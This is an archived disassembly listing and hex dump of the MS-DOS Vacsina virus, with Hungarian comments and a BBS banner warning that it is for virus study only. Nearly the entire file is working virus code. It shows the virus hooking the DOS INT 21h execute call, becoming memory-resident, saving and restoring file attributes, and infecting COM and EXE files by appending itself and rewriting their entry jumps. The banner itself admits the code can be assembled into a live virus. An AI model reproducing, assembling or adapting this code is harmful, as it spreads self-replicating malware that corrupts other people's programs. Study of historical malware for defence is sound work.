MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.vacsv.lst
2021-01-12 18:04:54 -06:00

747 lines
28 KiB
Plaintext
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
Vacsina VIRUS: `90.04.13.
Comment: K”v ri L szl¢
(41) 21-033
Unassembled list:
13B0:0100 E96908 JMP 096C
13B0:0103 49 DEC CX
13B0:0104 60 DB 60
13B0:0105 6D DB 6D
13B0:0106 206120 AND [BX+DI+20],AH
13B0:0109 56 PUSH SI
13B0:010A 61 DB 61
13B0:010B 63 DB 63
13B0:010C 7369 JNB 0177
13B0:010E 6E DB 6E
13B0:010F 61 DB 61
13B0:0110 205649 AND [BP+49],DL
13B0:0113 52 PUSH DX
13B0:0114 55 PUSH BP
13B0:0115 53 PUSH BX
13B0:0116 210D AND [DI],CX
13B0:0118 0A24 OR AH,[SI]
13B0:011A 0000 ADD [BX+SI],AL
13B0:05AA 0000 ADD [BX+SI],AL
13B0:05AC B409 MOV AH,09
13B0:05AE BA0301 MOV DX,0103
13B0:05B1 CD21 INT 21
13B0:05B3 B400 MOV AH,00
13B0:05B5 CD20 INT 20
13B0:05B7 005D00 ADD [DI+00],BL
13B0:05BA 5E POP SI
13B0:05BB 00FF ADD BH,BH
13B0:05BD FF6000 JMP [BX+SI+00]
13B0:05C0 4D DEC BP
13B0:05C1 07 POP ES
13B0:05C2 004B00 ADD [BP+DI+00],CL
13B0:05C5 0000 ADD [BX+SI],AL
13B0:05CD 0000 ADD [BX+SI],AL
13B0:05CF 00720E ADD [BP+SI+0E],DH
13B0:05D2 AE SCASB
13B0:05D3 0F POP CS
13B0:05D4 56 PUSH SI
13B0:05D5 05200D ADD AX,0D20
13B0:05D8 2000 AND [BX+SI],AL
13B0:05DA 050003 ADD AX,0300
13B0:05DD 01CD ADD BP,CX
13B0:05DF 21B400CD AND [SI+CD00],SI
13B0:05E3 2000 AND [BX+SI],AL
13B0:05E5 56 PUSH SI
13B0:05E6 41 INC CX
13B0:05E7 43 INC BX
13B0:05E8 53 PUSH BX
13B0:05E9 49 DEC CX
13B0:05EA 4E DEC SI
13B0:05EB 41 INC CX
13B0:05EC 2020 AND [BX+SI],AH
13B0:05EE 2020 AND [BX+SI],AH
13B0:05F0 0000 ADD [BX+SI],AL
13B0:05F2 800000 ADD BYTE PTR [BX+SI],00
13B0:05F5 0000 ADD [BX+SI],AL
13B0:05F7 007C11 ADD [SI+11],BH
13B0:05FA 37 AAA
13B0:05FB A800 TEST AL,00
13B0:05FD 40 INC AX
13B0:05FE C20046 RET 4600
13B0:0601 0A00 OR AL,[BX+SI]
13B0:0603 0000 ADD [BX+SI],AL
13B0:0605 0000 ADD [BX+SI],AL
13B0:0607 0000 ADD [BX+SI],AL
13B0:0609 2020 AND [BX+SI],AH
13B0:060B 2020 AND [BX+SI],AH
13B0:060D 2020 AND [BX+SI],AH
13B0:060F 2020 AND [BX+SI],AH
13B0:0611 2020 AND [BX+SI],AH
13B0:0613 2020 AND [BX+SI],AH
13B0:0615 2020 AND [BX+SI],AH
13B0:0617 2020 AND [BX+SI],AH
13B0:0619 2020 AND [BX+SI],AH
13B0:061B 2020 AND [BX+SI],AH
13B0:061D E80000 CALL 0620
13B0:0620 5B POP BX
13B0:0621 50 PUSH AX
13B0:0622 8CC0 MOV AX,ES
13B0:0624 051000 ADD AX,0010
13B0:0627 8B0E0E01 MOV CX,[010E]
13B0:062B 03C8 ADD CX,AX
13B0:062D 894FFB MOV [BX-05],CX
13B0:0630 8B0E1601 MOV CX,[0116]
13B0:0634 03C8 ADD CX,AX
13B0:0636 894FF7 MOV [BX-09],CX
13B0:0639 8B0E1001 MOV CX,[0110]
13B0:063D 894FF9 MOV [BX-07],CX
13B0:0640 8B0E1401 MOV CX,[0114]
13B0:0644 894FF5 MOV [BX-0B],CX
13B0:0647 8B3E1801 MOV DI,[0118]
13B0:064B 8B160801 MOV DX,[0108]
13B0:064F B104 MOV CL,04
13B0:0651 D3E2 SHL DX,CL
13B0:0653 8B0E0601 MOV CX,[0106]
13B0:0657 E317 JCXZ 0670
13B0:0659 26 ES:
13B0:065A C5B50001 LDS SI,[DI+0100]
13B0:065E 83C704 ADD DI,+04
13B0:0661 8CDD MOV BP,DS
13B0:0663 26 ES:
13B0:0664 032E0801 ADD BP,[0108]
13B0:0668 03E8 ADD BP,AX
13B0:066A 8EDD MOV DS,BP
13B0:066C 0104 ADD [SI],AX
13B0:066E E2E9 LOOP 0659
13B0:0670 0E PUSH CS
13B0:0671 1F POP DS
13B0:0672 BF0001 MOV DI,0100
13B0:0675 8BF2 MOV SI,DX
13B0:0677 81C60001 ADD SI,0100
13B0:067B 8BCB MOV CX,BX
13B0:067D 2BCE SUB CX,SI
13B0:067F F3 REPZ
13B0:0680 A4 MOVSB
13B0:0681 58 POP AX
13B0:0682 FA CLI
13B0:0683 8E57FB MOV SS,[BX-05]
13B0:0686 8B67F9 MOV SP,[BX-07]
13B0:0689 FB STI
13B0:068A FF6FF5 JMP FAR [BX-0B]
13B0:068D B003 MOV AL,03
13B0:068F CF IRET
;INT 21h rutin
13B0:0690 9C PUSHF
13B0:0691 3D004B CMP AX,4B00 ;program ind¡t s ?
13B0:0694 7406 JZ 069C ;igen
13B0:0696 9D POPF
13B0:0697 2E CS:
13B0:0698 FF2E0000 JMP FAR [0000] ;INT 21h kezdetre
13B0:069C 06 PUSH ES
13B0:069D 1E PUSH DS
13B0:069E 55 PUSH BP
13B0:069F 57 PUSH DI
13B0:06A0 56 PUSH SI
13B0:06A1 52 PUSH DX
13B0:06A2 51 PUSH CX
13B0:06A3 53 PUSH BX
13B0:06A4 50 PUSH AX
13B0:06A5 8BEC MOV BP,SP
13B0:06A7 B82435 MOV AX,3524
13B0:06AA CD21 INT 21 ;kilps kritikus hiba esetn
;rutin c¡mnek lekrdezse
13B0:06AC 2E CS:
13B0:06AD 8C060600 MOV [0006],ES ;let rol sa seg.
13B0:06B1 2E CS:
13B0:06B2 891E0400 MOV [0004],BX ;offs
13B0:06B6 0E PUSH CS
13B0:06B7 1F POP DS
13B0:06B8 BABD00 MOV DX,00BD
13B0:06BB B82425 MOV AX,2524
13B0:06BE CD21 INT 21 ;INT 24h  t ll¡t sa
13B0:06C0 0E PUSH CS
13B0:06C1 1F POP DS
13B0:06C2 BA1400 MOV DX,0014
13B0:06C5 B40F MOV AH,0F
13B0:06C7 CD21 INT 21 ;FCB-s file nyit s
13B0:06C9 B80043 MOV AX,4300
13B0:06CC 8E5E0E MOV DS,[BP+0E]
13B0:06CF 8B5606 MOV DX,[BP+06]
13B0:06D2 CD21 INT 21 ;file attrib lekrd.
13B0:06D4 7303 JNB 06D9
13B0:06D6 E9DA01 JMP 08B3
13B0:06D9 2E CS:
13B0:06DA 890E0800 MOV [0008],CX
13B0:06DE B80143 MOV AX,4301
13B0:06E1 80E1FE AND CL,FE
13B0:06E4 CD21 INT 21 ;file attrib be ll¡t s
13B0:06E6 7303 JNB 06EB
13B0:06E8 E9C801 JMP 08B3
13B0:06EB B8023D MOV AX,3D02
13B0:06EE 8E5E0E MOV DS,[BP+0E]
13B0:06F1 8B5606 MOV DX,[BP+06]
13B0:06F4 CD21 INT 21 ;file nyit s r/w
13B0:06F6 7303 JNB 06FB
13B0:06F8 E9A801 JMP 08A3
13B0:06FB 2E CS:
13B0:06FC A30A00 MOV [000A],AX
13B0:06FF 8BD8 MOV BX,AX
13B0:0701 0E PUSH CS
13B0:0702 1F POP DS
13B0:0703 BA0C00 MOV DX,000C
13B0:0706 B90600 MOV CX,0006
13B0:0709 B43F MOV AH,3F
13B0:070B CD21 INT 21 ;els” 6 byte olvas sa
13B0:070D 7219 JB 0728
13B0:070F 3D0600 CMP AX,0006
13B0:0712 7514 JNZ 0728 ;bej”tt mind ?
13B0:0714 2E CS:
13B0:0715 813E0C004D5A CMP WORD PTR [000C],5A4D ;EXE file ?
13B0:071B 7503 JNZ 0720 ;nem
13B0:071D E9B501 JMP 08D5
13B0:0720 2E CS:
13B0:0721 803E0C00E9 CMP BYTE PTR [000C],E9 ;COM file ?
13B0:0726 7403 JZ 072B ;igen
13B0:0728 E96F01 JMP 089A
;Teend”k COM file esetn
13B0:072B B80242 MOV AX,4202
13B0:072E B90000 MOV CX,0000
13B0:0731 8BD1 MOV DX,CX
13B0:0733 2E CS:
13B0:0734 8B1E0A00 MOV BX,[000A]
13B0:0738 CD21 INT 21 ;file mret lekrdezse
13B0:073A 72EC JB 0728
13B0:073C 83FA00 CMP DX,+00 ;65535 nl nagyobb ?
13B0:073F 75E7 JNZ 0728 ;igen
13B0:0741 3DB604 CMP AX,04B6 ;1026 n l kisebb ?
13B0:0744 76E2 JBE 0728 ;igen
13B0:0746 3D93F5 CMP AX,F593 ;62867-nl nagyobb ?
13B0:0749 73DD JNB 0728 ;igen
13B0:074B 2E CS:
13B0:074C A39E04 MOV [049E],AX ;mret megjegyzse
13B0:074F 2E CS:
13B0:0750 A10D00 MOV AX,[000D]
13B0:0753 050301 ADD AX,0103
13B0:0756 2E CS:
13B0:0757 A3A004 MOV [04A0],AX
13B0:075A B80242 MOV AX,4202
13B0:075D B9FFFF MOV CX,FFFF
13B0:0760 BAF8FF MOV DX,FFF8
13B0:0763 2E CS:
13B0:0764 8B1E0A00 MOV BX,[000A]
13B0:0768 CD21 INT 21 ;file mretnek megn”velse
13B0:076A 72BC JB 0728
13B0:076C 2E CS:
13B0:076D 8B1E0A00 MOV BX,[000A]
13B0:0771 0E PUSH CS
13B0:0772 1F POP DS
13B0:0773 BA0C00 MOV DX,000C
13B0:0776 B90800 MOV CX,0008
13B0:0779 B43F MOV AH,3F
13B0:077B CD21 INT 21 ;8 byte be
13B0:077D 72A9 JB 0728
13B0:077F 3D0800 CMP AX,0008 ;bej”tt mind ?
13B0:0782 75A4 JNZ 0728 ;nem
13B0:0784 2E CS:
13B0:0785 813E1000F47A CMP WORD PTR [0010],7AF4 ;?
13B0:078B 7577 JNZ 0804
13B0:078D 2E CS:
13B0:078E 833E120005 CMP WORD PTR [0012],+05 ;?
13B0:0793 90 NOP
13B0:0794 7392 JNB 0728
13B0:0796 2E CS:
13B0:0797 A10C00 MOV AX,[000C] ;els” beolvasott sz¢
13B0:079A 2E CS:
13B0:079B A39E04 MOV [049E],AX
13B0:079E 2E CS:
13B0:079F A10E00 MOV AX,[000E]
13B0:07A2 2E CS:
13B0:07A3 A3A004 MOV [04A0],AX
13B0:07A6 2D0301 SUB AX,0103
13B0:07A9 2E CS:
13B0:07AA A30C00 MOV [000C],AX
13B0:07AD B80042 MOV AX,4200
13B0:07B0 B90000 MOV CX,0000
13B0:07B3 BA0100 MOV DX,0001
13B0:07B6 2E CS:
13B0:07B7 8B1E0A00 MOV BX,[000A]
13B0:07BB CD21 INT 21 ;pozicion l s a file 2. bytej ra
13B0:07BD 725F JB 081E
13B0:07BF B440 MOV AH,40
13B0:07C1 0E PUSH CS
13B0:07C2 1F POP DS
13B0:07C3 BA0C00 MOV DX,000C
13B0:07C6 B90200 MOV CX,0002
13B0:07C9 CD21 INT 21 ;2 byte ki¡r sa
13B0:07CB 7251 JB 081E
13B0:07CD 3D0200 CMP AX,0002 ;ki¡rta mind ?
13B0:07D0 754C JNZ 081E ;nem
13B0:07D2 2E CS:
13B0:07D3 8B1E0A00 MOV BX,[000A]
13B0:07D7 B445 MOV AH,45
13B0:07D9 CD21 INT 21 ;file handle kett”zse
13B0:07DB 7208 JB 07E5
13B0:07DD 8BD8 MOV BX,AX
13B0:07DF B43E MOV AH,3E
13B0:07E1 CD21 INT 21 ;file z r sa
13B0:07E3 7239 JB 081E
13B0:07E5 B80042 MOV AX,4200
13B0:07E8 B90000 MOV CX,0000
13B0:07EB 2E CS:
13B0:07EC 8B169E04 MOV DX,[049E]
13B0:07F0 2E CS:
13B0:07F1 8B1E0A00 MOV BX,[000A]
13B0:07F5 CD21 INT 21 ;elejre pozicion l s
13B0:07F7 7225 JB 081E
13B0:07F9 B440 MOV AH,40
13B0:07FB 0E PUSH CS
13B0:07FC 1F POP DS
13B0:07FD B90000 MOV CX,0000
13B0:0800 CD21 INT 21 ;file mret be ll¡t sa
13B0:0802 721A JB 081E
13B0:0804 B80042 MOV AX,4200
13B0:0807 B90000 MOV CX,0000
13B0:080A 2E CS:
13B0:080B 8B169E04 MOV DX,[049E]
13B0:080F 83C20F ADD DX,+0F
13B0:0812 83E2F0 AND DX,-10
13B0:0815 2E CS:
13B0:0816 8B1E0A00 MOV BX,[000A]
13B0:081A CD21 INT 21 ;file pointer mozgat sa
13B0:081C 7303 JNB 0821
13B0:081E EB7A JMP 089A
13B0:0820 90 NOP
13B0:0821 2E CS:
13B0:0822 8B1E0A00 MOV BX,[000A]
13B0:0826 8CCA MOV DX,CS
13B0:0828 4A DEC DX
13B0:0829 8EDA MOV DS,DX
13B0:082B BA0000 MOV DX,0000
13B0:082E B9B604 MOV CX,04B6
13B0:0831 B440 MOV AH,40
13B0:0833 CD21 INT 21 ;”nmag nak kim sol sa
13B0:0835 72E7 JB 081E
13B0:0837 3DB604 CMP AX,04B6 ;siker<65>lt ?
13B0:083A 75E2 JNZ 081E ;nem
13B0:083C 2E CS:
13B0:083D 8B1E0A00 MOV BX,[000A]
13B0:0841 B445 MOV AH,45
13B0:0843 CD21 INT 21 ;file handle kett”zse
13B0:0845 7208 JB 084F
13B0:0847 8BD8 MOV BX,AX
13B0:0849 B43E MOV AH,3E
13B0:084B CD21 INT 21 ;file z r sa
13B0:084D 72CF JB 081E
13B0:084F 2E CS:
13B0:0850 C6060C00E9 MOV BYTE PTR [000C],E9 ;COM ?
13B0:0855 2E CS:
13B0:0856 8B169E04 MOV DX,[049E]
13B0:085A 83C20F ADD DX,+0F
13B0:085D 83E2F0 AND DX,-10
13B0:0860 83EA03 SUB DX,+03
13B0:0863 81C2AC03 ADD DX,03AC
13B0:0867 2E CS:
13B0:0868 89160D00 MOV [000D],DX
13B0:086C B80042 MOV AX,4200
13B0:086F B90000 MOV CX,0000
13B0:0872 8BD1 MOV DX,CX
13B0:0874 2E CS:
13B0:0875 8B1E0A00 MOV BX,[000A]
13B0:0879 CD21 INT 21 ;pozicion l s az elejre
13B0:087B 72A1 JB 081E
13B0:087D 2E CS:
13B0:087E 8B1E0A00 MOV BX,[000A]
13B0:0882 0E PUSH CS
13B0:0883 1F POP DS
13B0:0884 BA0C00 MOV DX,000C
13B0:0887 B90300 MOV CX,0003
13B0:088A B440 MOV AH,40
13B0:088C CD21 INT 21 ;3 byte JMP ki¡r sa
13B0:088E 728E JB 081E
13B0:0890 3D0300 CMP AX,0003 ;siker<65>lt ?
13B0:0893 7589 JNZ 081E ;nem
13B0:0895 B8070E MOV AX,0E07
13B0:0898 CD10 INT 10 ;beep jelzs hogy fert”z”tt
13B0:089A B43E MOV AH,3E
13B0:089C 2E CS:
13B0:089D 8B1E0A00 MOV BX,[000A]
13B0:08A1 CD21 INT 21 ;file z r sa
13B0:08A3 B80143 MOV AX,4301
13B0:08A6 8E5E0E MOV DS,[BP+0E]
13B0:08A9 8B5606 MOV DX,[BP+06]
13B0:08AC 2E CS:
13B0:08AD 8B0E0800 MOV CX,[0008]
13B0:08B1 CD21 INT 21 ;eredeti attrib vissza ll¡t sa
13B0:08B3 0E PUSH CS
13B0:08B4 1F POP DS
13B0:08B5 BA1400 MOV DX,0014
13B0:08B8 B410 MOV AH,10
13B0:08BA CD21 INT 21 ;FCB-s file z r sa
13B0:08BC B82425 MOV AX,2524
13B0:08BF 2E CS:
13B0:08C0 C5160400 LDS DX,[0004]
13B0:08C4 CD21 INT 21 ;INT 24 az eredetire
13B0:08C6 58 POP AX
13B0:08C7 5B POP BX
13B0:08C8 59 POP CX
13B0:08C9 5A POP DX
13B0:08CA 5E POP SI
13B0:08CB 5F POP DI
13B0:08CC 5D POP BP
13B0:08CD 1F POP DS
13B0:08CE 07 POP ES
13B0:08CF 9D POPF
13B0:08D0 2E CS:
13B0:08D1 FF2E0000 JMP FAR [0000]
;Teend”k EXE file esetn
13B0:08D5 B80242 MOV AX,4202
13B0:08D8 B90000 MOV CX,0000
13B0:08DB 8BD1 MOV DX,CX
13B0:08DD 2E CS:
13B0:08DE 8B1E0A00 MOV BX,[000A]
13B0:08E2 CD21 INT 21 ;file vgre poz.
13B0:08E4 72B4 JB 089A
13B0:08E6 83FA00 CMP DX,+00 ;nagyobb 65535-nl
13B0:08E9 75AF JNZ 089A ;igen
13B0:08EB 3DB3FD CMP AX,FDB3 ;nagyobb ?
13B0:08EE 73AA JNB 089A ;igen
13B0:08F0 2E CS:
13B0:08F1 A39E04 MOV [049E],AX ;mret t rol sa
13B0:08F4 2E CS:
13B0:08F5 A11000 MOV AX,[0010]
13B0:08F8 48 DEC AX
13B0:08F9 B109 MOV CL,09
13B0:08FB D3E0 SHL AX,CL
13B0:08FD 2E CS:
13B0:08FE 03060E00 ADD AX,[000E]
13B0:0902 2E CS:
13B0:0903 3B069E04 CMP AX,[049E]
13B0:0907 7591 JNZ 089A
13B0:0909 2E CS:
13B0:090A 8B1E0A00 MOV BX,[000A]
13B0:090E B440 MOV AH,40
13B0:0910 0E PUSH CS
13B0:0911 1F POP DS
13B0:0912 BA3900 MOV DX,0039
13B0:0915 B98400 MOV CX,0084
13B0:0918 CD21 INT 21 ;132 byte ki¡r sa
13B0:091A 72C8 JB 08E4
13B0:091C 3D8400 CMP AX,0084 ;siker<65>lt ?
13B0:091F 75E6 JNZ 0907 ;nem
13B0:0921 2E CS:
13B0:0922 8B1E0A00 MOV BX,[000A]
13B0:0926 B445 MOV AH,45
13B0:0928 CD21 INT 21 ;file handle megkett”zse
13B0:092A 7208 JB 0934
13B0:092C 8BD8 MOV BX,AX
13B0:092E B43E MOV AH,3E
13B0:0930 CD21 INT 21 ;file z r sa
13B0:0932 72B0 JB 08E4
13B0:0934 B80042 MOV AX,4200
13B0:0937 B90000 MOV CX,0000
13B0:093A 8BD1 MOV DX,CX
13B0:093C 2E CS:
13B0:093D 8B1E0A00 MOV BX,[000A]
13B0:0941 CD21 INT 21 ;file elejre poz.
13B0:0943 729F JB 08E4
13B0:0945 2E CS:
13B0:0946 C6060C00E9 MOV BYTE PTR [000C],E9 ;COM ?
13B0:094B 2E CS:
13B0:094C A19E04 MOV AX,[049E]
13B0:094F 051100 ADD AX,0011
13B0:0952 2E CS:
13B0:0953 A30D00 MOV [000D],AX
13B0:0956 2E CS:
13B0:0957 8B1E0A00 MOV BX,[000A]
13B0:095B B440 MOV AH,40
13B0:095D 0E PUSH CS
13B0:095E 1F POP DS
13B0:095F BA0C00 MOV DX,000C
13B0:0962 B90300 MOV CX,0003
13B0:0965 CD21 INT 21 ;3 byte ki¡r sa
13B0:0967 E930FF JMP 089A ;ugr s a file z r sra
13B0:096A 0000 ADD [BX+SI],AL
13B0:096C E80000 CALL 096F ;Belpsi pont
13B0:096F 5B POP BX ;IP BX -be
13B0:0970 2E CS:
13B0:0971 8947FB MOV [BX-05],AX
13B0:0974 B80000 MOV AX,0000
13B0:0977 8EC0 MOV ES,AX
13B0:0979 26 ES:
13B0:097A A1C500 MOV AX,[00C5]
13B0:097D 3D7F39 CMP AX,397F
13B0:0980 7508 JNZ 098A
13B0:0982 26 ES:
13B0:0983 A0C700 MOV AL,[00C7]
13B0:0986 3C05 CMP AL,05
13B0:0988 7332 JNB 09BC
13B0:098A 8BD4 MOV DX,SP
13B0:098C 2BD3 SUB DX,BX
13B0:098E 81EA6C0B SUB DX,0B6C
13B0:0992 7228 JB 09BC
13B0:0994 BAC504 MOV DX,04C5
13B0:0997 B104 MOV CL,04
13B0:0999 D3EA SHR DX,CL
13B0:099B 2E CS:
13B0:099C 899754FC MOV [BX+FC54],DX
13B0:09A0 8CD9 MOV CX,DS
13B0:09A2 03D1 ADD DX,CX
13B0:09A4 8EC2 MOV ES,DX
13B0:09A6 8BF3 MOV SI,BX
13B0:09A8 81C651FC ADD SI,FC51
13B0:09AC 8BFE MOV DI,SI
13B0:09AE B9B604 MOV CX,04B6
13B0:09B1 FC CLD
13B0:09B2 F3 REPZ
13B0:09B3 A4 MOVSB
13B0:09B4 06 PUSH ES
13B0:09B5 E80300 CALL 09BB
13B0:09B8 EB13 JMP 09CD
13B0:09BA 90 NOP
13B0:09BB CB RETF
13B0:09BC 8CC8 MOV AX,CS
13B0:09BE 8ED8 MOV DS,AX
13B0:09C0 8EC0 MOV ES,AX
13B0:09C2 8ED0 MOV SS,AX
13B0:09C4 2E CS:
13B0:09C5 8B47FB MOV AX,[BX-05]
13B0:09C8 2E CS:
13B0:09C9 FFA70101 JMP [BX+0101]
13B0:09CD BE0000 MOV SI,0000
13B0:09D0 BF0000 MOV DI,0000
13B0:09D3 8BCB MOV CX,BX
13B0:09D5 81C161FC ADD CX,FC61
13B0:09D9 8CC2 MOV DX,ES
13B0:09DB 4A DEC DX
13B0:09DC 8EC2 MOV ES,DX
13B0:09DE 8CDA MOV DX,DS
13B0:09E0 4A DEC DX
13B0:09E1 8EDA MOV DS,DX
13B0:09E3 03F1 ADD SI,CX ;CX=48f0
13B0:09E5 4E DEC SI
13B0:09E6 8BFE MOV DI,SI
13B0:09E8 FD STD
13B0:09E9 F3 REPZ
13B0:09EA A4 MOVSB
13B0:09EB FC CLD
13B0:09EC 2E CS:
13B0:09ED 8B9754FC MOV DX,[BX+FC54]
13B0:09F1 26 ES:
13B0:09F2 29160300 SUB [0003],DX
13B0:09F6 26 ES:
13B0:09F7 8C0E0100 MOV [0001],CS
13B0:09FB BF0000 MOV DI,0000
13B0:09FE 8BF3 MOV SI,BX
13B0:0A00 81C651FC ADD SI,FC51
13B0:0A04 B9B604 MOV CX,04B6 ;byte-ok sz ma
13B0:0A07 1E PUSH DS
13B0:0A08 07 POP ES ;ES=DS
13B0:0A09 0E PUSH CS
13B0:0A0A 1F POP DS ;DS=CS
13B0:0A0B F3 REPZ
13B0:0A0C A4 MOVSB ;”nmag nak  tpakol sa
13B0:0A0D 26 ES:
13B0:0A0E 832E030001 SUB WORD PTR [0003],+01
13B0:0A13 53 PUSH BX
13B0:0A14 8CCB MOV BX,CS
13B0:0A16 B450 MOV AH,50
13B0:0A18 CD21 INT 21 ;? rezidens m r ?
13B0:0A1A 5B POP BX
13B0:0A1B 2E CS:
13B0:0A1C 8C0E3600 MOV [0036],CS
13B0:0A20 2E CS:
13B0:0A21 8B162C00 MOV DX,[002C] ;k”rnyezet c¡me
13B0:0A25 4A DEC DX
13B0:0A26 8EC2 MOV ES,DX
13B0:0A28 26 ES:
13B0:0A29 8C0E0100 MOV [0001],CS
13B0:0A2D B82135 MOV AX,3521
13B0:0A30 53 PUSH BX
13B0:0A31 CD21 INT 21 ;INT 21h c¡m lekrdezse
13B0:0A33 36 SS:
13B0:0A34 8C060200 MOV [0002],ES
13B0:0A38 36 SS:
13B0:0A39 891E0000 MOV [0000],BX
13B0:0A3D 5B POP BX
13B0:0A3E B82125 MOV AX,2521
13B0:0A41 8CD2 MOV DX,SS
13B0:0A43 8EDA MOV DS,DX
13B0:0A45 BAC000 MOV DX,00C0
13B0:0A48 CD21 INT 21 ;INT 21h  tir ny¡t sa
13B0:0A4A B80000 MOV AX,0000
13B0:0A4D 8EC0 MOV ES,AX
13B0:0A4F 26 ES:
13B0:0A50 C706C5007F39 MOV WORD PTR [00C5],397F ;?
13B0:0A56 26 ES:
13B0:0A57 C606C70005 MOV BYTE PTR [00C7],05 ?
13B0:0A5C 8CC8 MOV AX,CS
13B0:0A5E 8ED8 MOV DS,AX
13B0:0A60 B41A MOV AH,1A
13B0:0A62 BA5000 MOV DX,0050
13B0:0A65 CD21 INT 21 ;DTA. be ll¡t sa
13B0:0A67 2E CS:
13B0:0A68 8B47FB MOV AX,[BX-05]
13B0:0A6B E94EFF JMP 09BC
13B0:0A6E B704 MOV BH,04
13B0:0A70 AC LODSB
13B0:0A71 05F47A ADD AX,7AF4
13B0:0A74 050000 ADD AX,0000
13B0:0A77 0000 ADD [BX+SI],AL
Dumped list:
13B0:0000 CD 20 00 A0 00 9A F0 FE-1D F0 F4 02 E7 0F 2F 03 . ............/.
13B0:0010 E7 0F BC 02 E7 0F AF 0F-01 03 01 00 02 FF FF FF ................
13B0:0020 FF FF FF FF FF FF FF FF-FF FF FF FF A7 13 4C 01 ..............L.
13B0:0030 21 13 14 00 18 00 B0 13-FF FF FF FF 00 00 00 00 !...............
13B0:0040 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
13B0:0050 CD 21 CB 00 00 00 00 00-00 00 00 00 00 20 20 20 .!...........
13B0:0060 20 20 20 20 20 20 20 20-00 00 00 00 00 20 20 20 .....
13B0:0070 20 20 20 20 20 20 20 20-00 00 00 00 00 00 00 00 ........
13B0:0080 01 20 0D 61 63 73 76 2E-63 6F 6D 20 0D 63 3A 5C . .acsv.com .c:\
13B0:0090 75 74 69 6C 3B 63 3A 5C-75 74 69 6C 5C 78 79 77 util;c:\util\xyw
13B0:00A0 72 69 74 65 3B 63 3A 5C-6E 79 65 6C 76 65 6B 5C rite;c:\nyelvek\
13B0:00B0 64 62 61 73 65 3B 63 3A-5C 6E 79 65 6C 76 65 6B dbase;c:\nyelvek
13B0:00C0 5C 63 6C 69 70 70 65 72-0D 00 00 00 00 00 00 00 \clipper........
13B0:00D0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
13B0:00E0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
13B0:00F0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
13B0:0100 E9 69 08 49 60 6D 20 61-20 56 61 63 73 69 6E 61 .i.I`m a Vacsina
13B0:0110 20 56 49 52 55 53 21 0D-0A 24 00 00 00 00 00 00 VIRUS!..$......
13B0:0120 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
13B0:0590 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
13B0:05A0 00 00 00 00 00 00 00 00-00 00 00 00 B4 09 BA 03 ................
13B0:05B0 01 CD 21 B4 00 CD 20 00-5D 00 5E 00 FF FF 60 00 ..!... .].^...`.
13B0:05C0 4D 07 00 4B 00 00 00 00-00 00 00 00 00 00 00 00 M..K............
13B0:05D0 72 0E AE 0F 56 05 20 0D-20 00 05 00 03 01 CD 21 r...V. . ......!
13B0:05E0 B4 00 CD 20 00 56 41 43-53 49 4E 41 20 20 20 20 ... .VACSINA
13B0:05F0 00 00 80 00 00 00 00 00-7C 11 37 A8 00 40 C2 00 ........|.7..@..
13B0:0600 46 0A 00 00 00 00 00 00-00 20 20 20 20 20 20 20 F........
13B0:0610 20 20 20 20 20 20 20 20-20 20 20 20 20 E8 00 00 ...
13B0:0620 5B 50 8C C0 05 10 00 8B-0E 0E 01 03 C8 89 4F FB [P............O.
13B0:0630 8B 0E 16 01 03 C8 89 4F-F7 8B 0E 10 01 89 4F F9 .......O......O.
13B0:0640 8B 0E 14 01 89 4F F5 8B-3E 18 01 8B 16 08 01 B1 .....O..>.......
13B0:0650 04 D3 E2 8B 0E 06 01 E3-17 26 C5 B5 00 01 83 C7 .........&......
13B0:0660 04 8C DD 26 03 2E 08 01-03 E8 8E DD 01 04 E2 E9 ...&............
13B0:0670 0E 1F BF 00 01 8B F2 81-C6 00 01 8B CB 2B CE F3 .............+..
13B0:0680 A4 58 FA 8E 57 FB 8B 67-F9 FB FF 6F F5 B0 03 CF .X..W..g...o....
13B0:0690 9C 3D 00 4B 74 06 9D 2E-FF 2E 00 00 06 1E 55 57 .=.Kt.........UW
13B0:06A0 56 52 51 53 50 8B EC B8-24 35 CD 21 2E 8C 06 06 VRQSP...$5.!....
13B0:06B0 00 2E 89 1E 04 00 0E 1F-BA BD 00 B8 24 25 CD 21 ............$%.!
13B0:06C0 0E 1F BA 14 00 B4 0F CD-21 B8 00 43 8E 5E 0E 8B ........!..C.^..
13B0:06D0 56 06 CD 21 73 03 E9 DA-01 2E 89 0E 08 00 B8 01 V..!s...........
13B0:06E0 43 80 E1 FE CD 21 73 03-E9 C8 01 B8 02 3D 8E 5E C....!s......=.^
13B0:06F0 0E 8B 56 06 CD 21 73 03-E9 A8 01 2E A3 0A 00 8B ..V..!s.........
13B0:0700 D8 0E 1F BA 0C 00 B9 06-00 B4 3F CD 21 72 19 3D ..........?.!r.=
13B0:0710 06 00 75 14 2E 81 3E 0C-00 4D 5A 75 03 E9 B5 01 ..u...>..MZu....
13B0:0720 2E 80 3E 0C 00 E9 74 03-E9 6F 01 B8 02 42 B9 00 ..>...t..o...B..
